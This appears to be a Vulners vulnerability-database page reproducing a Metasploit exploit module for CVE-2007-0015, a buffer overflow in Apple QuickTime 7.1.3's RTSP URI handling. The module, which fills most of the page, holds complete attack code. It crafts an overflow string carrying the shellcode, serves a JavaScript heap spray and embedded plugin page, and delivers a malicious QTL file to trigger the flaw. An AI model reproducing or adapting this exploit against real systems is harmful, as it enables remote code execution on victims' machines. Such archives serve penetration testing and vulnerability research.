Lucene search
K

Apple QuickTime 7.1.3 RTSP URI Buffer Overflow

🗓️ 31 Mar 2007 05:29:37Reported by MC <[email protected]>, egypt <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 33 Views

Apple QuickTime 7.1.3 RTSP URI Buffer Overflow, exploits buffer overflow in Apple QuickTime 7.1.3, tested against IE 6 and Firefox 1.5.0.3 on Windows XP SP0/

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2007-0015
4 May 201000:00
circl
Check Point Advisories
Apple Quicktime RTSP URL Buffer Overflow - Ver2 (CVE-2007-0015)
16 Apr 201400:00
checkpoint_advisories
Check Point Advisories
Apple Quicktime RTSP URL Buffer Overflow - Ver2 (CVE-2007-0015)
16 Apr 201400:00
checkpoint_advisories
CVE
CVE-2007-0015
1 Jan 200723:00
cve
Cvelist
CVE-2007-0015
1 Jan 200723:00
cvelist
Exploit DB
Apple QuickTime 7.1.3 - RTSP URI Buffer Overflow (Metasploit)
4 May 201000:00
exploitdb
Tenable Nessus
Mac OS X Security Update 2007-001
24 Jan 200700:00
nessus
Tenable Nessus
QuickTime RTSP URL Handler Buffer Overflow (Windows)
2 Feb 200700:00
nessus
NVD
CVE-2007-0015
1 Jan 200723:28
nvd
Packet Storm
MOAB-01-01-2007.rb.txt
4 Jan 200700:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({
  #  :os_name => OperatingSystems::Match::WINDOWS,
  #  # No particular browser.  Works on at least IE6 and Firefox 1.5.0.3
  #  :javascript => true,
  #  :rank       => NormalRanking, # reliable memory corruption
  #  :vuln_test  => nil,
  #})

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime 7.1.3 RTSP URI Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Apple QuickTime
        7.1.3. This module was inspired by MOAB-01-01-2007.  The
        Browser target for this module was tested against IE 6 and
        Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the
        QuickTime plugin.
      },
      'Author'         => [ 'MC', 'egypt' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-0015' ],
          [ 'OSVDB', '31023'],
          [ 'BID', '21829' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
        },
      'Platform' => 'win',
      'Targets'  =>
        [
          [ 'Automatic', { } ],
          [ 'Apple QuickTime Player 7.1.3',
            {
              'Ret' => 0x6855d8a2  # xpsp2/2k3 :( | vista ;)
            }
          ],
          [ 'Browser Universal',
            {
              'Ret' => 0x0c0c0c0c # tested on xpsp0 and sp2
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2007-01-01',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(client, request)

    return if ((p = regenerate_payload(client)) == nil)

    if (target.name =~ /Automatic/)
      if (request['User-Agent'] =~ /QuickTime/i)
        target = targets[1]
      else
        target = targets[2]
      end
    end

    cruft  =  rand_text_alphanumeric(4)
    # This is all basically filler on the browser target because we can't
    # expect the SEH to be in a reliable place across multiple browsers.
    # Heap spray ftw.
    sploit =  rand_text_english(307)
    sploit << p.encoded + "\xeb\x06" + rand_text_english(2)
    sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV')

    if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/)
      print_status("Sending exploit QTL file (target: #{target.name})")
      content = build_qtl(sploit)
    else
      print_status("Sending init HTML")

      shellcode = Rex::Text.to_unescape(p.encoded)
      url =  ((datastore['SSL']) ? "https://" : "http://")
      url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
      url << ":" + datastore['SRVPORT'].to_s
      url << get_resource
      js = <<-ENDJS
          #{js_heap_spray}
          sprayHeap(unescape("#{shellcode}"), 0x#{target.ret.to_s 16}, 0x4000);
        ENDJS
      content =  "<html><body><script><!--\n#{js}//--></script>"
      content << <<-ENDEMBED
          <OBJECT
          CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
          WIDTH="1"
          HEIGHT="1"
          CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
          <PARAM name="SRC"        VALUE = "#{url}/#{cruft}.qtl">
          <PARAM name="QTSRC"      VALUE = "#{url}/#{cruft}.qtl">
          <PARAM name="AUTOPLAY"   VALUE = "true"               >
          <PARAM name="TYPE"       VALUE = "video/quicktime"    >
          <PARAM name="TARGET"     VALUE = "myself"             >
          <EMBED
            SRC        = "#{url}/#{cruft}.qtl"
            QTSRC      = "#{url}/#{cruft}.qtl"
            TARGET     = "myself"
            WIDTH      = "1"
            HEIGHT     = "1"
            AUTOPLAY   = "true"
            PLUGIN     = "quicktimeplugin"
            TYPE       = "video/quicktime"
            CACHE      = "false"
            PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
          </EMBED>
          </OBJECT>
        ENDEMBED
      content << "</body></html>"
    end

    send_response(client, content, { 'Content-Type' => "text/html" })

    # Handle the payload
    handler(client)
  end

  def build_qtl(overflow)
    cruft  =  rand_text_english(4)

    content =  "<?xml version=\"1.0\"?>\n"
    content << "<?quicktime type=\"application/x-quicktime-media-link\"?>\n"
    content << "<embed autoplay=\"true\" \n"
    content << "moviename=\"#{cruft}\" \n"
    content << "qtnext=\"#{cruft}\" \n"
    content << "type=\"video/quicktime\" \n"
    content << "src=\"rtsp://#{cruft}:#{overflow}\" />\n"

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.3High risk
Vulners AI Score7.3
CVSS 26.8
EPSS0.48419
33